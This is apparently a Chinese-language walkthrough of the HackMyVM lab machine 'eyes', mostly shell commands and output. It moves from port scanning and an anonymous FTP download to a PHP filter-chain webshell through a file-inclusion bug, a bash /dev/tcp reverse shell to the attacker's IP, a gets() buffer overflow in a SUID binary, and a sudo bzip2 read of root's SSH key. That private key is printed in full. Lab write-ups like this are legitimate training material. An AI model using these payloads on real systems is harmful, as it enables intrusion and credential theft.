hack-my-vm-eyes

hack-my-vm-eyes

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 172.20.10.2                                                                                   [17:07:39]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 17:16 CST
Nmap scan report for 172.20.10.2
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:23:25:0E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.97 seconds

深度服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
kali@kali [~] ➜  sudo nmap -sT -sV -sC -p21,22,80 -O 172.20.10.2                                                                                 [17:16:12]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 17:16 CST
Nmap scan report for 172.20.10.2
Host is up (0.00048s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:172.20.10.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             125 Apr 04  2021 index.php
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b1:12:94:12:60:67:e1:0b:45:c1:8d:e9:21:13:bc:51 (RSA)
|   256 b7:7f:25:94:d6:4e:88:56:8a:22:34:16:c2:de:ba:02 (ECDSA)
|_  256 30:c7:a2:90:39:5d:24:13:bf:aa:ba:4c:a7:f4:2f:bb (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:23:25:0E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.45 seconds

可以发现,这个ftp是有匿名登录的

服务渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
kali@kali [~] ➜  ftp 172.20.10.2                                                                                                                 [17:16:59]
Connected to 172.20.10.2.
220 (vsFTPd 3.0.3)
Name (172.20.10.2:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48514|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             125 Apr 04  2021 index.php
226 Directory send OK.
ftp> put x
local: x remote: x
229 Entering Extended Passive Mode (|||7627|)
550 Permission denied.
ftp>

无法上传的,所以我们只能下载文件下来看看

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali [~/web_shell_toos] ➜  cat index.php                                                                                                    [17:18:55]
<?php
$file = $_GET['fil3'];
if(isset($file))
{
include($file);
}
else
{
print("Here my eyes...");
}
?>
<!--Monica's eyes-->

是一个标准的文件包含,可以日志包含,这里直接filter链秒了

1
2
3
kali@kali [~/web_shell_toos/php_filter_chain_generator] git:(main) ➜  python3 php_filter_chain_generator.py --chain '<?php eval($_POST["x"]);?>' [17:20:34]
[+] The following gadget chain will generate the following code : <?php eval($_POST["x"]);?> (base64 value: PD9waHAgZXZhbCgkX1BPU1RbIngiXSk7Pz4)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

接下来直接反弹shell

1
/bin/bash -c 'exec bash -i &>/dev/tcp/172.20.10.5/8888 <&1'
1
x=system("%2fbin%2fbash+-c+%27exec+bash+-i+%26%3e%2fdev%2ftcp%2f172.20.10.5%2f8888+%3c%261%27");

拿到www-data权限

1
2
3
4
5
6
kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [17:24:28]
listening on [any] 8888 ...
connect to [172.20.10.5] from (UNKNOWN) [172.20.10.2] 54906
bash: cannot set terminal process group (328): Inappropriate ioctl for device
bash: no job control in this shell
www-data@eyes:~/html$

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
www-data@eyes:~/html$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
www-data@eyes:~/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/opt/ls
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/umount
/usr/bin/chsh
www-data@eyes:~/html$

发现了一个ls文件,有suid权限

1
2
3
4
5
6
7
8
www-data@eyes:/opt$ ls -la
ls -la
total 36
drwxr-xr-x  2 root   root    4096 Apr  4  2021 .
drwxr-xr-x 18 root   root    4096 Apr  4  2021 ..
-rwsr-sr-x  1 root   root   16864 Apr  4  2021 ls
-rw-r--r--  1 root   root     349 Apr  4  2021 ls.c
-rw-r--r--  1 monica monica    41 Apr  4  2021 note.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@eyes:/opt$ cat ls.c
cat ls.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

int main(void)
{
 char command[100];
 char ls[50]="/usr/bin/ls";
 char name[50];
 printf("Enter your name:");
 gets(name);
 strcpy(command,ls);
 setuid(1000);
 setgid(1000);
 printf("Hi %s, Im executing ls\n Output:\n",name);
 system(command);
}
www-data@eyes:/opt$

一眼溢出,因为gets函数的存在,对我们输入的name的长度是不会有限制的,理论上讲,我们是可以溢出覆盖ls字符数组里面的值的,但是我们是不知道溢出的长度的,但是name字符数组50字节,所以说,我们用60字节开始尝试

1
2
3
4
5
6
7
8
9
www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ls
ls.c
note.txt
Enter your name:Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, Im executing ls
 Output:
www-data@eyes:/opt$

这是没问题的,70个试试

1
2
3
4
5
6
7
www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sh: 1: AAAAAA: not found
Enter your name:Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, Im executing ls
 Output:
www-data@eyes:/opt$

告诉我们AAAAAA没找到,那就是64字节就可以溢出了

1
2
3
4
5
www-data@eyes:/opt$ ./ls
./ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbash
whoami
monica

拿到权限了,不过是一个用户的,尝试获取root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
sudo -l
Matching Defaults entries for monica on eyes:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User monica may run the following commands on eyes:
    (ALL) NOPASSWD: /usr/bin/bzip2
sudo /usr/bin/bzip2 -c /root/.ssh/id_rsa | /usr/bin/bzip2 -d 
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEArFKlwNcXIsZLyj2E4waArCaGEOYVJxX50k4mF81nzPtiIgX+32e9
sMfZd6oDpovRq2hEE8TKqdfHogyvpVHV2wBs/BLOAajO63GnFX8dAoBi/yzhnyYXgrNE9b
Cs5D6itQVBxC1EINy1TS67T14+jqK+9UNWdfQC8VlENBeaVbYI3vUSxQCbRqs92nQLrSVM
hYOa0zhYdWlkCH46aprZi1OTe4ZvSfuzYU3+tmhonwiYMyeAYCSEsnkCeUTF4zke9kRovP
upbKiPWoYHEKXPWYCDJ9xOD/K1yMsK8YJ2rOqyr5TkyO5HdEGZxj8MFMTFLyeyFG2kUHYy
llW2WQoqZQAAA8DTPxkj0z8ZIwAAAAdzc2gtcnNhAAABAQCsUqXA1xcixkvKPYTjBoCsJo
YQ5hUnFfnSTiYXzWfM+2IiBf7fZ72wx9l3qgOmi9GraEQTxMqp18eiDK+lUdXbAGz8Es4B
qM7rcacVfx0CgGL/LOGfJheCs0T1sKzkPqK1BUHELUQg3LVNLrtPXj6Oor71Q1Z19ALxWU
Q0F5pVtgje9RLFAJtGqz3adAutJUyFg5rTOFh1aWQIfjpqmtmLU5N7hm9J+7NhTf62aGif
CJgzJ4BgJISyeQJ5RMXjOR72RGi8+6lsqI9ahgcQpc9ZgIMn3E4P8rXIywrxgnas6rKvlO
TI7kd0QZnGPwwUxMUvJ7IUbaRQdjKWVbZZCiplAAAAAwEAAQAAAQEAgq5ajReQsAp5R3HH
6PLxeZvtZ7tUp0N/JQGm2b4nzceF8A9j7cAalom4XYtNIWw/ISH9HpDKsGq3NikwusqIx4
BXJgKMv61o3hxefWrccR0z9hfvMmYMxk11Km1FcAIgGe9WpJM/azx1MYcS/WmXP0wkTJM4
alMWODleA7Myk3QuG/jwVEZE37xaJHPwTpv9VRbqIjqw9XQbGvArzyuAsGWtMMMpZ3zwx5
LuthcWa2B0u4ND+KCi6vk/phwtoHJL26FiCFHdNUda7UgssdBQ0jby/0wdHK4BvwooZS6v
23Ly1Lw37prz8GN8S504Xa5zKG0St1Xb+rT77lRDOsfTgQAAAIEAjbYIgPvhTt3ZS+ne8R
iDgwrIOZIKCwb+s5o5F0vH0c/++s+weAghl+Fn8QfgCAMHapEZmyKjvLbixUT2B8F765S4
6omR8PD3i0Rr0j+pbBz9jNga/+XJjctLF+atU3aG0tB1Nc5Z/+eGtHjL1UJPNRaHtyb3zt
gOvMAN/5ZR8sMAAACBANl6TrhqiJaQcOdOT05Y4FxSh4r4ng2TTd5k1B9d2lSIVKeviKtj
L4QDlT/uzE6Rf0bNgunP+qT5YjB4ag/17sm7GDzSd+8MDnkeRTDEtHjPwLEHUYDyNl0/wS
9B+rlHu84WMYexmltA30PjAUQXaztYcKortlBHF8PRqHcatJaJAAAAgQDK2MGRmyabimXN
Ursppl+JsMn/xvaUj6AvlTmdyH7rGmjwa4s9OP503AX59/pRyyhGOuPyaiWR8kNp5YOkH0
Zv8bGSSWUP3b7ScjgCMVaXXVmEgG+feZyf1swM2WwQVZzs152wZcrK3hFG/vIFlFwcDD3y
pN2NMCkY0EFGqmz9/QAAAAlyb290QGV5ZXM=
-----END OPENSSH PRIVATE KEY-----

可以直接读flag的,这里读到了私钥,可以私钥登录了